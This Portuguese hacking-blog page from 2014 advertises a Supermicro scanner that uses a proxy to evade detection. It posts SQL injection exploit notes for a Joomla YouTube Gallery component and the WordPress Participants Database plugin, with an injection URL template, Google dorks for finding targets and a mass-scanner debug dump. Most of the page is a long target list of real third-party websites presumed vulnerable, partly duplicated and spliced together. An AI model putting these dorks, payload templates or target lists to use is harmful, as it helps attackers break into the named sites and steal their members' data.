Esta ferramenta pode verificar sub-redes, hosts individual e ainda inclui a opção de utilizar proxy dificultando a detecção do atacante e não bastando também possui a opção de pesquisa da falha via SHODANHQ
Basta copiar o código abaixo e colar em um arquivo com o nome supermicro_scan.sh
Lembrando Este script é para utilizadores de LINUX.
SCRIPT=> { http://pastebin.com/epQmZne8 }
FONTE=> { http://virusbrasil.com.br/?p=106 }
segunda-feira, 18 de agosto de 2014
JOOMLA YOUTUBE GALLERY 4.1.7 SQL INJECTION
Joomla Youtube Galeria componente versão 4.1.7 sofre de uma vulnerabilidade de injeção SQL
Exploit Título: com_youtubegallery componente Joomla - vulnerabilidade de injeção SQL
DORK[0]: inurl:index.php?option=com_youtubegallery
Vendedor Homepage: http://www.joomlaboat.com/youtube-gallery
Software Link: http://www.joomlaboat.com/youtube-gallery
Versão: 4.x (3.x talvez)
Testado em: nova versão 4.1.7 em Joomla 1.5, 2.5, 3
CVE: CVE-2014-4960
EXEMPLO=>
http://TARGET/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1{SQL-INJECTION}&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700
terça-feira, 10 de junho de 2014
Exploit Participants Database <= 1.5.4.8 Wordpress
0xParticipants Database
Wordpress Participants Database 1.5.4.8 - SQL Injection
Wordpress Participants Database 1.5.4.8 - SQL Injection
É um plugin Wordpress populares que oferece a funcionalidade necessária para construir e manter um banco de dados de pessoas.
- Detalhes sobre a Vulnerabilidade
1.Devido ao privilégio insuficiente verifica que é possível para anonymous(unauthenticated) para desencadear algumas ações administrativas, se algum dos códigos de acesso é utilizado (por exemplo, inscrição de página).
2. A ação "export CSV" tem um parâmetro chamado "query" que pode conter uma consulta SQL arbitrária.
Isso significa que um usuário não autenticado pode executar instruções SQL arbitrários (por exemplo, criar um usuário administrador, ler ou escrever arquivos ou executar código dependendo dos privilégios de usuário do MySQL).
----------------------------------------------------------------------------------------------------------------------------------
0xEXPLOIT:
http://www.exploit-db.com/exploits/33613/
0xDORK[0]:"Index of" "/wp-content/uploads/participants-database"
0xDORK[1]:inurl:"pdb-signup/" "PDB signup"
0xDORK[2]:inurl:"pdb-signup/" intitle:"PDB signup "
----------------------------------------------------------------------------------------------------------------------------------
[SCANNER INURL]
http://pastebin.com/TzijC99y
DEBUG:
Array
(
[0] => Array
(
)
[host] => www.google.com.br
[dork] => %22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22
[arquivo] => resultados.txt
[tipoerro] => 2
[exploit] =>
[achar] => Index of /wp-content/uploads/participants-database
[cmd] => ping -c 1 _ALVO_
[ipProxy] =>
[porta] =>
[url] => /search?q=%22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22&num=1900&btnG=Search
[port] => 80
)
RESULTADO PARCIAL:
http://webcache.googleusercontent.com/search?q=cache:kUL3synKmD0J:http://ebookily.org/xls/gassendi%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:WuVzKwF26PUJ:http://ebookily.org/xls/kathak-dress%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:OZ9vR__pkOgJ:http://www.tag.ubc.ca/iswnetwork.ca/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:MS8BxtAMxoAJ:http://www.shreeyashmatrimonial.com/kiran/d/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:l8rmzvOyZOkJ:http://www.younguttarakhand.org/wp/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:t43d046zpLQJ:http://partycrewgh.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:3kQuvZzwr6EJ:http://top3crew.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:gpBnRGnjbxcJ:http://sdara.com/sdarawebsite/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nHBeHM57ojEJ:http://qsaudi.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:8yfwjuM8apgJ:http://www.blc-denver2.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:1uEWo4ctyKYJ:http://www.csa.us/www/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:G64f413f7V4J:http://www.gcm73.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:vSoBRrZja70J:http://www.powercollaborative.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:VyTtsWKYn2gJ:http://cccc-houston.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:BAh_697eT80J:http://www.mjbandofgold.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:Luc-zFtM2nEJ:http://www.gapfootball.org.au/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:R6DbMAITjosJ:http://www.4k-nn.ru/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:1ZHqjROYqJ8J:http://www.bcscpa.com/bcs-blog/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:-4lNmZAQJTYJ:http://graceland4kids.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:seg55mSkGSoJ:http://emeraldtigers.com.au/new_2013_website/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nR8gLIEbCOEJ:http://artisanwineclub.com/index/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:cn3Yz66lQ-AJ:http://www.dsnyfamily.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:7W_fZ-33EVQJ:http://promovgroup.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:KT4lO7pNnswJ:http://www.rebbepiper.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:oujptjZTnnMJ:http://www.firt2013barcelona.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.sarorhttp://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.saroregon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/egon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/
Assinar:
Postagens (Atom)